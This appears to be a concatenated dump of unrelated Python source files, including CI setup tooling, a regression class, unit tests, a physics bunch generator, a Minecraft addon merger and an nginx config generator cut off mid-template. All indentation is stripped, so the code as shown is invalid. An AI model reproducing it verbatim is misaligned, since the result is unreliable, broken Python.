ensure_parent_dir_exists(executable_path)
response = requests.get(COMPOSE_RELEASES_URL + artifact_name)
response.raise_for_status()
with open(executable_path, 'wb') as f:
for chunk in response.iter_content(16384):
f.write(chunk)
f.flush()
if platform_name != 'windows':
os.chmod(executable_path, os.stat(executable_path).st_mode | stat.S_IXUSR | stat.S_IXGRP | stat.S_IXOTH)
def display_action(script_file):
display_header = f'Running: {script_file}'
echo_info(f'\n{display_header}\n{"-" * len(display_header)}\n')
@click.command(context_settings=CONTEXT_SETTINGS, short_help='Run CI setup scripts')
@click.argument('checks', nargs=-1)
@click.option('--changed', is_flag=True, help='Only target changed checks')
def setup(checks, changed):
"""
Run CI setup scripts
"""
cur_platform = platform.system().lower()
upgrade_docker_compose(cur_platform)
scripts_path = os.path.join(get_root(), '.azure-pipelines', 'scripts')
echo_info("Run CI setup scripts")
if checks:
if checks[0] == 'skip':
echo_info('Skipping set up')
else:
echo_info(f'Checks chosen: {", ".join(checks)}')
else:
echo_info('Checks chosen: changed')
check_envs = list(get_test_envs(checks, every=True, sort=True, changed_only=changed))
echo_info(f'Configuring these envs: {check_envs}')
for check, _ in check_envs:
check_scripts_path = os.path.join(scripts_path, check)
if not os.path.isdir(check_scripts_path):
echo_debug(f"Skip! No scripts for check `{check}` at: `{check_scripts_path}`")
continue
contents = os.listdir(check_scripts_path)
if cur_platform not in contents:
echo_debug(f"Skip! No scripts for check `{check}` and platform `{cur_platform}`")
continue
setup_files = sorted(os.listdir(os.path.join(check_scripts_path, cur_platform)))
scripts = [s for s in setup_files if not s.startswith("_")]
non_exe = [s for s in setup_files if s.startswith("_")]
non_exe_msg = f" (Non-executable setup files: {non_exe})" if non_exe else ""
echo_info(f'Setting up: {check} with these config scripts: {scripts}{non_exe_msg}')
for script in scripts:
script_file = os.path.join(check_scripts_path, cur_platform, script)
display_action(script_file)
cmd = [script_file]
if script_file.endswith('.py'):
cmd.insert(0, 'python')
subprocess.run(cmd, shell=True, check=True)
|
nilq/baby-python
|
python
|
#!/usr/bin/env python
"""
Partitioned Least Square class
Developer:
Omar Billotti
Description:
Partitioned Least Square class
"""
from numpy import shape, zeros, hstack, ones, vstack, sum as sum_elements, array, inf, where
from numpy.random import rand
from numpy.linalg import lstsq
from scipy.optimize import nnls
from scipy.linalg import norm
from ._utils import vec1, indextobeta, checkalpha, bmatrix
class PartitionedLs(object):
"""
Partitioned Least Square class
"""
def __init__(self, algorithm="alt"):
"""
Constructor of Partioned Least Square Class
Parameters
----------
algorithm : string
String used to set some algorithm to choose to create
the model. possible values alt and opt
Returns
-------
None.
"""
self.model = None
self.algorithm = algorithm
def fit(self, x, y, p):
"""
Fits a PartialLS Regression model to the given data
Parameters
----------
x : Matrix
describing the examples
y : Array
vector with the output values for each example
p : Matrix
specifying how to partition the M attributes into K subsets.
P{m,k} should be 1 if attribute number m belongs to partition k
Returns
-------
None.
"""
if self.algorithm == "opt":
self.__fit_opt_nnls(x, y, p)
elif self.algorithm == "alt":
self.__fit_alt_nnls(x, y, p)
else:
self.__fit_alt_nnls(x, y, p)
def __fit_opt_nnls(self, x,
y, p):
"""
Fits a PartialLS OPT Regression model to the given data
Parameters
----------
x : Matrix
describing the examples
y : Array
vector with the output values for each example
p : Matrix
specifying how to partition the M attributes into K subsets.
P{m,k} should be 1 if attribute number m belongs to partition k
Returns
-------
None.
"""
xo = hstack((x, ones((shape(x)[0], 1))))
po = vstack(
(hstack((p, zeros((shape(p)[0], 1)))), vec1(shape(p)[1] + 1)))
k = shape(po)[1]
b_start, results = (-1, [])
for i in range(b_start + 1, 2 ** k):
beta = array(indextobeta(i, k))
xb = bmatrix(xo, po, beta)
alpha = nnls(xb, y)[0]
optval = norm(xo.dot(po * alpha.reshape(-1, 1)).dot(beta) - y)
result = (optval, alpha[:-1], beta[:-1], alpha[-1] * beta[-1], p)
results.append(result)
optvals = [r[0] for r in results]
optindex = optvals.index(min(optvals))
(opt, a, b, t, p) = results[optindex]
A = sum_elements(p * a.reshape(-1, 1), 0)
b = b * A
# substituting all 0.0 with 1.0
for z in where(A == 0.0):
A[z] = 1.0
a = sum_elements((p * a.reshape(-1, 1)) / A, 1)
self.model = (opt, a, b, t, p)
def __fit_alt_nnls(self, x,
y, p,
n=20):
"""
Fits a PartialLS Alt Regression model to the given data
Parameters
----------
x : Matrix N * M
matrix describing the examples
y : vector
vector with the output values for each example
p : Matrix M * K
specifying how to partition the M attributes into K subsets.
P{m,k} should be 1 if attribute number m belongs to partition k
n : int
number of alternating loops to be performed, defaults to 20.
Returns
-------
None.
"""
# Rewriting the problem in homogenous coordinates
xo = hstack((x, ones((shape(x)[0], 1))))
po = vstack((hstack((p, zeros((shape(p)[0], 1)))),
vec1(shape(p)[1] + 1)))
m, k = shape(po)
alpha = rand(m)
beta = (rand(k) - 0.5) * 10
t = rand()
initvals = (0, alpha, beta, t, inf)
i_start, alpha, beta, t, optval = initvals
for i in range(i_start + 1, n):
# nnls problem with fixed beta variables
po_beta = sum_elements(po * beta, 1)
xo_beta = xo * po_beta
alpha = nnls(xo_beta, y)[0]
alpha = checkalpha(alpha, po)
sum_alpha = sum_elements(po * alpha.reshape(-1, 1), 0)
po_alpha = sum_elements(po * sum_alpha, 1)
alpha = alpha / po_alpha
beta = beta * sum_alpha
# ls problem with fixed alpha variables
xo_alpha = xo.dot(po * alpha.reshape(-1, 1))
beta = lstsq(xo_alpha, y, rcond=None)[0]
optval = norm(xo.dot(po * alpha.reshape(-1, 1)).dot(beta) - y, 2)
self.model = (optval, alpha[:-1], beta[:-1], alpha[-1] * beta[-1], p)
def predict(self, x):
"""
Description
Predicts points using the formula: f(X) = X * (P .* a) * b + t.
Parameters
----------
x : Matrix N * M
matrix describing the examples
Returns
-------
out : Array
contains the predictions of the given model on examples in X
"""
(_, alpha, beta, t, p) = self.model
return array(x).dot(p * alpha.reshape(-1, 1)).dot(beta) + t
|
nilq/baby-python
|
python
|
import logging
from source.bridgeLogger import configureLogging
from nose2.tools.such import helper as assert_helper
def test_case01():
with assert_helper.assertRaises(TypeError):
configureLogging()
def test_case02():
with assert_helper.assertRaises(TypeError):
configureLogging('/tmp')
def test_case03():
with assert_helper.assertRaises(TypeError):
configureLogging(None, 'myLog')
def test_case04():
result = configureLogging('/tmp', 'mylog', 'abc')
assert isinstance(result, logging.Logger)
def test_case05():
result = configureLogging('/tmp', None, 'abc')
assert isinstance(result, logging.Logger)
def test_case06():
result = configureLogging('/tmp', None)
assert isinstance(result, logging.Logger)
|
nilq/baby-python
|
python
|
import unittest
from imdb_app_data.moviemodel import MovieModel
from imdb_app_logic.movie_scraper import MovieScraper
from imdb_app_logic.ratingcalculator import RatingCalculator
class Test(unittest.TestCase):
def test_scraper(self):
scraper = MovieScraper()
scraper.get_movie_list()
#self.assertIsNotNone(scraper.topmovies)
self.assertTrue(len(scraper.topmovies) == 20)
def test_oscar_calculator(self):
test_movie = MovieModel(1,"TEST",5,20000,2,"TEST")
test_list = [test_movie]
rc = RatingCalculator()
rc.calculate_oscar_rating(test_list)
self.assertTrue(test_list[0].adjusted_rating == 5.3)
def test_review_penalizer(self):
test_movie = MovieModel(1,"TEST",5,200000,2,"TEST")
test_list = [test_movie]
rc = RatingCalculator()
rc.maxreviews = 500000
rc.review_penalizer(test_list)
self.assertTrue(test_list[0].adjusted_rating == 4.7)
if __name__ == "__main__":
unittest.main()
# python -m unittest unit_tests.py
|
nilq/baby-python
|
python
|
from docker import DockerClient
from pytest import fixture
from yellowbox.clients import open_docker_client
@fixture(scope="session")
def docker_client() -> DockerClient:
with open_docker_client() as client:
yield client
|
nilq/baby-python
|
python
|
def flow_control(k):
if (k == 0):
s = "Variable k = %d equals 0." % k
elif (k == 1):
s = "Variable k = %d equals 1." % k
else:
s = "Variable k = %d does not equal 0 or 1." % k
print(s)
def main():
i = 0
flow_control(i)
i = 1
flow_control(i)
i = 2
flow_control(i)
if __name__ == "__main__":
main()
|
nilq/baby-python
|
python
|
# Copyright 2012 Philip Chimento
"""Sound the system bell, Qt implementation."""
from pyface.qt import QtGui
def beep():
"""Sound the system bell."""
QtGui.QApplication.beep()
|
nilq/baby-python
|
python
|
"""
agenda:
1. speedup visualize_result
2. grouping labels
speed bottlenecks:
1. colorEncoding
results:
1. with visualize_result optimize: 0.045s --> 0.002s
2. with grouping labels: 0.002s --> 0.002-0.003s
"""
import os
import sys
import time
PATH = os.path.join(os.getcwd(), '..')
sys.path.append(PATH)
import csv
import numpy as np
import torch
from torchvision import transforms
import cv2
from img_utils import ImageLoad_cv2
from scipy.io import loadmat
from utils import colorEncode
from inference import predict, setup_model
from lib.utils import as_numpy
from profiler import profile
from idx_utils import create_idx_group, edit_colors_names_group
def preprocess():
WIDTH = 484
HEIGHT = 240
ENSEMBLE_N = 3
# GET COLOR ENCODING AND ITS INDEX MAPPING
colors = loadmat('../data/color150.mat')['colors']
root = '..'
names = {}
with open('../data/object150_info.csv') as f:
reader = csv.reader(f)
next(reader)
for row in reader:
names[int(row[0])] = row[5].split(";")[0]
idx_map = create_idx_group()
colors, names = edit_colors_names_group(colors, names)
# SETUP MODEL
cfg_path = os.path.join('..', 'config', 'ade20k-mobilenetv2dilated-c1_deepsup.yaml')
#cfg_path="config/ade20k-resnet18dilated-ppm_deepsup.yaml"
model = setup_model(cfg_path, root, gpu=0)
model.eval()
# GET DATA AND PROCESS IMAGE
data = np.load(os.path.join('..', 'test_set', 'cls1_rgb.npy'))
data = data[:, :, ::-1]
img = ImageLoad_cv2(data, WIDTH, HEIGHT, ENSEMBLE_N, True)
# MODEL FEED
predictions = predict(model, img, ENSEMBLE_N, gpu = 0, is_silent = False)
return predictions, colors, names, idx_map
def process_predict_bad(scores, colors, names, idx_map, is_silent):
"""
colorEncode is used
input:
the predictions of model
output:
the colorize predictions
"""
_, pred = torch.max(scores, dim=1)
pred = as_numpy(pred.squeeze(0).cpu()) # shape of pred is (height, width)
#The predictions for infering distance
#seg = np.moveaxis(pred, 0, -1)
pred = idx_map[pred]
red = np.int32(pred)
pred_color = colorEncode(pred, colors).astype(np.uint8)
if is_silent:
return pred_color
pixs = pred.size
uniques, counts = np.unique(pred, return_counts = True)
for idx in np.argsort(counts)[::-1]:
name = names[uniques[idx] + 1]
ratio = counts[idx] / pixs * 100
if ratio > 0.1:
print(" {}: {:.2f}%".format(name, ratio))
return pred_color
def process_predict_good(scores, colors, names, idx_map, is_silent):
"""
replace colorEncode by numpy way
input:
the predictions of model
output:
the colorize predictions
"""
_, pred = torch.max(scores, dim=1)
pred = as_numpy(pred.squeeze(0).cpu()) # shape of pred is (height, width)
#The predictions for infering distance
pred = idx_map[pred]
pred = np.int32(pred)
pred_color = rock_the_colorencoding(pred, colors)
if is_silent:
return pred_color
pixs = pred.size
uniques, counts = np.unique(pred, return_counts = True)
for idx in np.argsort(counts)[::-1]:
name = names[uniques[idx] + 1]
ratio = counts[idx] / pixs * 100
if ratio > 0.1:
print(" {}: {:.2f}%".format(name, ratio))
return pred_color
def rock_the_colorencoding(labelmap, colors):
return colors[labelmap]
if __name__ == '__main__':
# COLOR ENCODING
import matplotlib.pyplot as plt
predictions, colors, names, idx_map = preprocess()
print('Comparing Two Ways of Color Encoding...')
for i in range(5):
# bad: use colorEncode
torch.cuda.synchronize()
start = time.time()
pred_color_orig = process_predict_bad(predictions, colors, names, idx_map, is_silent = True)
torch.cuda.synchronize()
end = time.time()
print('Original Runtime: {}s'.format(end - start))
# good: replace by numpy lookup
torch.cuda.synchronize()
start = time.time()
pred_color_gd = process_predict_good(predictions, colors, names, idx_map, is_silent = True)
torch.cuda.synchronize()
end = time.time()
print('Improved Runtime: {}s'.format(end - start))
assert (pred_color_gd == pred_color_orig).all(), 'SOMETHING WRONG WITH NEW COLOR ENCODING'
plt.imshow(pred_color_gd)
plt.show()
|
nilq/baby-python
|
python
|
#!/usr/bin/env python
#--------------------------------------------------------
# The classes will generates bunches for pyORBIT J-PARC linac
# at the entrance of LI_MEBT1 accelerator line (by default)
# It is parallel, but it is not efficient.
#--------------------------------------------------------
import math
import sys
import os
import random
import orbit_mpi
from orbit_mpi import mpi_comm
from orbit_mpi import mpi_datatype
from orbit_mpi import mpi_op
from orbit.bunch_generators import TwissContainer
from orbit.bunch_generators import KVDist2D, KVDist3D
from orbit.bunch_generators import GaussDist2D, GaussDist3D
from orbit.bunch_generators import WaterBagDist2D, WaterBagDist3D
from orbit.bunch_generators import TwissAnalysis
from bunch import Bunch
class JPARC_Linac_BunchGenerator:
"""
Generates the pyORBIT JPARC Linac Bunches.
Twiss parameters has the following units: x in [m], xp in [rad]
and the X and Y emittances are un-normalized. The longitudinal emittance
is in [GeV*m].
"""
def __init__(self,twissX, twissY, twissZ, frequency = 324.0e+6):
self.twiss = (twissX, twissY, twissZ)
self.bunch_frequency = frequency
self.bunch = Bunch()
syncPart = self.bunch.getSyncParticle()
#set H- mass
#self.bunch.mass(0.9382723 + 2*0.000511)
self.bunch.mass(0.939294)
self.bunch.charge(-1.0)
syncPart.kinEnergy(0.003)
self.c = 2.99792458e+8 # speed of light in m/sec
self.beam_current = 40.0 # beam current in mA
self.rf_wave_lenght = self.c/self.bunch_frequency
self.si_e_charge = 1.6021773e-19
def getKinEnergy(self):
"""
Returns the kinetic energy in GeV
"""
return self.bunch.getSyncParticle().kinEnergy()
def setKinEnergy(self, e_kin = 0.003):
"""
Sets the kinetic energy in GeV
"""
self.bunch.getSyncParticle().kinEnergy(e_kin)
def getZtoPhaseCoeff(self,bunch):
"""
Returns the coefficient to calculate phase in degrees from the z-coordinate.
"""
bunch_lambda = bunch.getSyncParticle().beta()*self.rf_wave_lenght
phase_coeff = 360./bunch_lambda
return phase_coeff
def getBeamCurrent(self):
"""
Returns the beam currect in mA
"""
return self.beam_current
def setBeamCurrent(self, current):
"""
Sets the beam currect in mA
"""
self.beam_current = current
def getBunch(self, nParticles = 0, distributorClass = WaterBagDist3D, cut_off = -1.):
"""
Returns the pyORBIT bunch with particular number of particles.
"""
comm = orbit_mpi.mpi_comm.MPI_COMM_WORLD
rank = orbit_mpi.MPI_Comm_rank(comm)
size = orbit_mpi.MPI_Comm_size(comm)
data_type = mpi_datatype.MPI_DOUBLE
main_rank = 0
bunch = Bunch()
self.bunch.copyEmptyBunchTo(bunch)
macrosize = (self.beam_current*1.0e-3/self.bunch_frequency)
macrosize /= (math.fabs(bunch.charge())*self.si_e_charge)
distributor = None
if(distributorClass == WaterBagDist3D):
distributor = distributorClass(self.twiss[0],self.twiss[1],self.twiss[2])
else:
distributor = distributorClass(self.twiss[0],self.twiss[1],self.twiss[2], cut_off)
bunch.getSyncParticle().time(0.)
for i in range(nParticles):
(x,xp,y,yp,z,dE) = distributor.getCoordinates()
(x,xp,y,yp,z,dE) = orbit_mpi.MPI_Bcast((x,xp,y,yp,z,dE),data_type,main_rank,comm)
if(i%size == rank):
bunch.addParticle(x,xp,y,yp,z,dE)
nParticlesGlobal = bunch.getSizeGlobal()
bunch.macroSize(macrosize/nParticlesGlobal)
return bunch
|
nilq/baby-python
|
python
|
import excursion
import excursion.testcases.fast as scandetails
import excursion.optimize
import numpy as np
import logging
def test_2d():
scandetails.truth_functions = [
scandetails.truth,
]
N_INIT = 5
N_UPDATES = 1
N_BATCH = 5
N_DIM = 2
X,y_list, gps = excursion.optimize.init(scandetails, n_init = N_INIT, seed = 1)
index = 0
for index in range(1,N_UPDATES+1):
newX, acqvals = excursion.optimize.gridsearch(gps, X, scandetails, batchsize=N_BATCH)
newys_list = [func(np.asarray(newX)) for func in scandetails.truth_functions]
for i,newys in enumerate(newys_list):
y_list[i] = np.concatenate([y_list[i],newys])
X = np.concatenate([X,newX])
gps = [excursion.get_gp(X,y_list[i]) for i in range(len(scandetails.truth_functions))]
print(X,X.shape)
assert X.shape == (N_INIT + N_BATCH * N_UPDATES,N_DIM)
assert np.allclose(X[0],[6.25533007e-01, 1.08048674e+00])
|
nilq/baby-python
|
python
|
#!/usr/bin/env python3
import time
import sys
import zmq
import numpy as np
import pyglet
from ctypes import byref, POINTER
from pyglet.gl import *
from pyglet.window import key
window = pyglet.window.Window(640, 640, style=pyglet.window.Window.WINDOW_STYLE_DIALOG)
def recv_array(socket):
"""
Receive a numpy array over zmq
"""
md = socket.recv_json()
msg = socket.recv(copy=True, track=False)
buf = memoryview(msg)
A = np.frombuffer(buf, dtype=md['dtype'])
A = A.reshape(md['shape'])
return A
def update(dt):
# Get an image from the camera
print('requesting image')
global last_img
socket.send_json({ 'robot': { 'get_image': None }})
last_img = recv_array(socket)
print('img received')
def step(vels, pos=None):
global last_img
req = {
"set_vels": vels,
#"get_image": None
}
if pos != None:
req['set_pos'] = pos
socket.send_json({"robot": req})
@window.event
def on_key_press(symbol, modifiers):
"""
if symbol == key.BACKSPACE or symbol == key.SLASH:
print('RESET')
env.reset()
env.render('pyglet')
return
"""
if symbol == key.ESCAPE:
sys.exit(0)
@window.event
def on_key_release(symbol, modifiers):
pass
@window.event
def on_draw():
img_height, img_width, _ = last_img.shape
# Draw the human render to the rendering window
img = np.ascontiguousarray(np.flip(last_img, axis=0))
img_data = pyglet.image.ImageData(
img_width,
img_height,
'RGB',
img.ctypes.data_as(POINTER(GLubyte)),
pitch=img_width * 3,
)
img_data.blit(
0,
0,
0,
width=window.width,
height=window.height
)
# Force execution of queued commands
glFlush()
@window.event
def on_close():
pyglet.app.exit()
# Connect to the Gym bridge ROS node
addr_str = "tcp://%s:%s" % ('flogo.local', 5858)
#addr_str = "tcp://%s:%s" % ('localhost', 5858)
print("Connecting to %s ..." % addr_str)
context = zmq.Context()
socket = context.socket(zmq.PAIR)
socket.connect(addr_str)
last_img = np.zeros(shape=(64, 64, 3), dtype=np.uint8)
last_img[:, :, 0] = 255
pyglet.clock.schedule_interval(update, 1/30.0)
pyglet.app.run()
|
nilq/baby-python
|
python
|
from django.urls import path
from . import views
urlpatterns = [
path('', views.mainpage_sec, name='index'),
path('authorize_ingress_sec', views.authorize_ingress_sec, name='authorize_ingress'),
path('revoke_ingress_sec', views.revoke_ingress_sec, name='authorize_ingress')
]
|
nilq/baby-python
|
python
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import migrations, models
from django.conf import settings
class Migration(migrations.Migration):
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
]
operations = [
migrations.CreateModel(
name='Block',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('name', models.CharField(max_length=1000, verbose_name='\u540d\u5b57')),
('desc', models.CharField(max_length=1000, verbose_name='\u63cf\u8ff0')),
('create_time', models.DateTimeField(auto_now_add=True)),
('update_time', models.DateTimeField(auto_now=True)),
('manger', models.ForeignKey(verbose_name='\u7ba1\u7406\u5458', to=settings.AUTH_USER_MODEL)),
],
options={
'verbose_name': '\u677f\u5757',
'verbose_name_plural': '\u677f\u5757',
},
),
]
|
nilq/baby-python
|
python
|
import json
import os
import shutil
from os import listdir
from os import path
from os.path import isfile, join
from zipfile import ZipFile
from shutil import copyfile
from glob import glob
import ntpath
import threading
import re
def find_all(name, path):
result = []
for root, dirs, files in os.walk(path):
if name in files:
result.append(os.path.join(root, name))
return result
def addDeathCounter(path_to_bp):
copy_ac(path_to_bp,"death_counter_j5cfmnkccwt7ppim3lsyue.json")
copy_animation(path_to_bp,"death_counter_start_j5cfmnkccwt7ppim3lsyue.json")
add_a_c_to_player(path_to_bp,
"controller.animation.death_counter_j5cfmnkccwt7ppim3lsyue",
"death_counter_j5cfmnkccwt7ppim3lsyue")
add_a_c_to_player(path_to_bp,
"animation.start_death_counter_j5cfmnkccwt7ppim3lsyue",
"start_death_counter_j5cfmnkccwt7ppim3lsyue")
def addWeatherClear(path_to_bp):
copy_ac(path_to_bp,"clear_weather_out_of_bed_njorunnb628pievrfeckwx.json")
add_a_c_to_player(path_to_bp,
"controller.animation.clear_weather_out_of_bed_njorunnb628pievrfeckwx",
"clear_weather_id_out_of_bed_njorunnb628pievrfeckwx")
def addOPS(path_to_bp):
copy_ac(path_to_bp,"one_player_sleep_njorunnb628pievrfeckwx.json")
add_a_c_to_player(path_to_bp,
"controller.animation.one_player_sleep_njorunnb628pievrfeckwx",
"one_player_sleep_njorunnb628pievrfeckwx")
def copy_ac(path_to_bp,ac_name):
path_to_a_c=join(path_to_bp,"animation_controllers")
if not(os.path.isdir(path_to_a_c)):
os.mkdir(path_to_a_c)
copyfile(join("lookups",ac_name),join(path_to_a_c,ac_name))
def copy_animation(path_to_bp,ani_name):
path_to_animations=join(path_to_bp,"animations")
if not(os.path.isdir(path_to_animations)):
os.mkdir(path_to_animations)
copyfile(join("lookups",ani_name),join(path_to_animations,ani_name))
def add_a_c_to_player(path_to_bp,a_c_handle,ac_common_handle,addtoscript=True):
result = [y for x in os.walk(path_to_bp) for y in glob(os.path.join(x[0], '*.json'))]
found=False
for file in result:
print(file)
with open(file, 'r+') as f:
data=""
for line in f:
data+=line
data=re.sub("\/\/[^\n]*\n", '', data )
data = json.loads(data)
if type(data) is dict:
if "minecraft:entity" in data.keys():
if data["minecraft:entity"]["description"]["identifier"]=="minecraft:player":
found=True
if "scripts" not in data["minecraft:entity"]["description"].keys() and addtoscript:
data["minecraft:entity"]["description"]["scripts"]={"animate":[]}
if "animations" not in data["minecraft:entity"]["description"].keys():
data["minecraft:entity"]["description"]["animations"]={}
if addtoscript:
data["minecraft:entity"]["description"]["scripts"]["animate"].append(ac_common_handle)
data["minecraft:entity"]["description"]["animations"][ac_common_handle]=a_c_handle
f.seek(0)
json.dump(data, f, indent=4)
f.truncate()
print(found)
if not found:
path_to_a_c=join(path_to_bp,"entities")
if not(os.path.isdir(path_to_a_c)):
os.mkdir(path_to_a_c)
copyfile(join("lookups","player.json"),join(path_to_a_c,"player.json"))
copy_ac(path_to_bp,"one_player_sleep_njorunnb628pievrfeckwx.json")
def edit_manifests(path_to_bp , packs):
with open(join(path_to_bp,"manifest.json"), 'r+') as f:
data = json.load(f)
data["header"]["description"]+=", modified by a RavinMaddHatters pack merge tool to include: {}".format(packs)
f.seek(0)
json.dump(data, f, indent=4)
f.truncate()
def mergePacks(path,death=False,ops=False,clearWeather=False):
cwd = os.getcwd()
path_to_save="temp"
with ZipFile(path, 'r') as zipObj:
zipObj.extractall(path_to_save)
manifests=find_all("manifest.json",path_to_save)
path_to_bp=""
for mani in manifests:
with open(mani) as f:
packmani = json.load(f)
for sub in packmani["modules"]:
if "data"== sub["type"]:
path_to_bp=os.path.dirname(mani)
pack =""
if clearWeather:
addWeatherClear(path_to_bp)
if death:
addDeathCounter(path_to_bp)
pack+="Death Counter"
if ops:
if len(pack)>0:
pack+=", "
pack+="One player sleep"
addOPS(path_to_bp)
if death or ops:
edit_manifests(path_to_bp,pack)
temp_path=join(cwd,path_to_save)
os.chdir(temp_path)
pack_name=ntpath.basename(path)
file_paths = []
for directory,_,_ in os.walk(temp_path):
files=glob(os.path.join(directory, "*.*"))
for file in files:
print(os.getcwd())
print(file)
file_paths.append(file.replace(os.getcwd()+"\\",""))
with ZipFile(pack_name, 'x') as zip:
for file in file_paths:
print(file)
zip.write(file)
os.chdir(cwd)
copyfile(join(path_to_save,pack_name),"merged_"+pack_name)
shutil.rmtree(path_to_save)
print("packs have been merged and processing is completed, please use merged_"+pack_name)
def loadJsonKillComments(jsonFile):
data=""
with open(jsonFile, 'r+') as f:
for line in f:
data+=line
data=re.sub("\/\/[^\n]*\n", '', data )
data = json.loads(data)
return data
def get_recursively(search_dict, field):
"""
Takes a dict with nested lists and dicts,
and searches all dicts for a key of the field
provided.
"""
fields_found = []
keys=[]
for key, value in search_dict.items():
if key == field:
fields_found.append(value)
keys.append([key])
elif isinstance(value, dict):
results,recurKeys = get_recursively(value, field)
for result in results:
fields_found.append(result)
for recurKey in recurKeys:
tempKey=[key]
tempKey+=recurKey
keys.append(tempKey)
elif isinstance(value, list):
for ind in range(len(value)):
item=value[ind]
if isinstance(item, dict):
more_results,more_recurKeys = get_recursively(item, field)
for another_result in more_results:
fields_found.append(another_result)
for more_recurkey in more_recurKeys:
tempKey=[ind]
tempKey+=more_recurkey
keys.append(tempKey)
return fields_found, keys
def check_compatiblity(Base,Cross):
path_to_base="base"
path_to_cross="Cross"
with ZipFile(Base, 'r') as zipObj:
zipObj.extractall(path_to_base)
with ZipFile(Cross, 'r') as zipObj:
zipObj.extractall(path_to_cross)
result = [y for x in os.walk(path_to_base) for y in glob(os.path.join(x[0], '*.json'))]
base_handles=[]
for file in result:
print(file)
data=loadJsonKillComments(file)
try:
fields_found, keys=get_recursively(data,"identifier")
except:
fields_found=[]
keys=[]
base_handles+=fields_found
result2 = [y for x in os.walk(path_to_cross) for y in glob(os.path.join(x[0], '*.json'))]
cross_handles=[]
for file in result2:
print(file)
data=loadJsonKillComments(file)
try:
fields_found, keys=get_recursively(data,"identifier")
except:
fields_found=[]
keys=[]
cross_handles+=fields_found
print(base_handles)
print(cross_handles)
shutil.rmtree(path_to_base)
shutil.rmtree(path_to_cross)
return set(base_handles).intersection(set(cross_handles))
if __name__ == "__main__":
from tkinter import ttk
from tkinter import filedialog
from tkinter import messagebox
from tkinter import StringVar, Button, Label, Entry, Tk, Checkbutton, END, ACTIVE
from tkinter import filedialog, Scale,DoubleVar,HORIZONTAL,IntVar,Listbox, ANCHOR
def browsepack():
#browse for a structure file.
packPath.set(filedialog.askopenfilename(filetypes=(
("addon", "*.mcaddon *.MCADDON *.MCPACK *mcpack"),("zip", "*.zip *.ZIP") )))
def make_pack_from_gui():
mergePacks(packPath.get(),
death=death_counter_check.get(),
ops=ops_counter_check.get(),
clearWeather=clear_counter_check.get())
def crossCheckPacksGui():
base_pack=packPath.get()
if len(base_pack)>0:
cross_pack=(filedialog.askopenfilename(filetypes=(
("Addon to Cross Check", "*.mcaddon *.MCADDON *.MCPACK *.MCPACK" ),("zip", "*.zip *.ZIP") )))
intersections=check_compatiblity(base_pack,cross_pack)
print(intersections)
if len(intersections)!=0:
printInt="\n".join(intersections)
messagebox.showerror("Not Compatible","The two packs are not compatible because they both modify the following game features: \n{}".format(printInt))
else:
messagebox.showinfo("Compatible","The two packs are likely compatible")
else:
messagebox.showerror("No Base Pack", "You must first select a base pack to check compatiblity")
root = Tk()
root.title("Addon Checker")
core_pack=Label(root, text="Core Pack")
add_ins=Label(root, text="Common Additions (will be added to the core pack):")
death_counter_check = IntVar()
ops_counter_check = IntVar()
clear_counter_check = IntVar()
packPath = StringVar()
death_check = Checkbutton(root, text="Death Counter", variable=death_counter_check, onvalue=1, offvalue=0)
ops_check = Checkbutton(root, text="One Player Sleep", variable=ops_counter_check, onvalue=1, offvalue=0)
clear_check = Checkbutton(root, text="One player sleep with clear weather", variable=clear_counter_check, onvalue=1, offvalue=0)
browsButton = Button(root, text="Browse", command=browsepack)
packButton = Button(root, text="Merge in Packs", command=make_pack_from_gui)
Cross_check = Button(root, text="Cross Check a Pack", command=crossCheckPacksGui)
path_entry = Entry(root, textvariable=packPath, width=30)
r=0
core_pack.grid(row=r, column=0,columnspan=2)
r+=1
path_entry.grid(row=r, column=0)
browsButton.grid(row=r, column=1)
r+=1
add_ins.grid(row=r, column=0,columnspan=2)
r+=1
death_check.grid(row=r, column=0,columnspan=2)
r+=1
ops_check.grid(row=r, column=0,columnspan=2)
r+=1
clear_check.grid(row=r, column=0,columnspan=2)
r+=1
Cross_check.grid(row=r, column=0)
packButton.grid(row=r, column=1)
root.mainloop()
root.quit()
|
nilq/baby-python
|
python
|
__author__ = 'Sergei'
from model.contact import Contact
from random import randrange
def test_del_contact(app):
if app.contact.count() == 0:
app.contact.create_c(Contact(first_n= "first",mid_n= "middle",last_n= "last",nick_n= "kuk",company= "adda",address= "575 oiweojdckjgsd,russia",home_ph= "12134519827",
cell_ph= "120092340980",email= "first.lastmiddle.@adda.com"))
old_contact = app.contact.get_contact_list()
index = randrange(len(old_contact))
app.contact.contact_delete_by_index(index)
new_contact = app.contact.get_contact_list()
assert len(old_contact) - 1 == len(new_contact)
old_contact[index:index+1] = []
assert old_contact == new_contact
|
nilq/baby-python
|
python
|
# -*- coding: utf-8 -*-
"""General purpose nginx test configuration generator."""
import getpass
from typing import Optional
import pkg_resources
def construct_nginx_config(nginx_root: str, nginx_webroot: str, http_port: int, https_port: int,
other_port: int, default_server: bool, key_path: Optional[str] = None,
cert_path: Optional[str] = None, wtf_prefix: str = 'le') -> str:
"""
This method returns a full nginx configuration suitable for integration tests.
:param str nginx_root: nginx root configuration path
:param str nginx_webroot: nginx webroot path
:param int http_port: HTTP port to listen on
:param int https_port: HTTPS port to listen on
:param int other_port: other HTTP port to listen on
:param bool default_server: True to set a default server in nginx config, False otherwise
:param str key_path: the path to a SSL key
:param str cert_path: the path to a SSL certificate
:param str wtf_prefix: the prefix to use in all domains handled by this nginx config
:return: a string containing the full nginx configuration
:rtype: str
"""
key_path = key_path if key_path \
else pkg_resources.resource_filename('certbot_integration_tests', 'assets/key.pem')
cert_path = cert_path if cert_path \
else pkg_resources.resource_filename('certbot_integration_tests', 'assets/cert.pem')
return '''\
# This error log will be written regardless of server scope error_log
# definitions, so we have to set this here in the main scope.
#
# Even doing this, Nginx will still try to create the default error file, and
# log a non-fatal error when it fails. After that things will work, however.
error_log {nginx_root}/error.log;
# The pidfile will be written to /var/run unless this is set.
pid {nginx_root}/nginx.pid;
user {user};
worker_processes 1;
events {{
worker_connections 1024;
}}
# “This comment contains valid Unicode”.
http {{
# Set an array of temp, cache and log file options that will otherwise default to
# restricted locations accessible only to root.
client_body_temp_path {nginx_root}/client_body;
fastcgi_temp_path {nginx_root}/fastcgi_temp;
proxy_temp_path {nginx_root}/proxy_temp;
#scgi_temp_path {nginx_root}/scgi_temp;
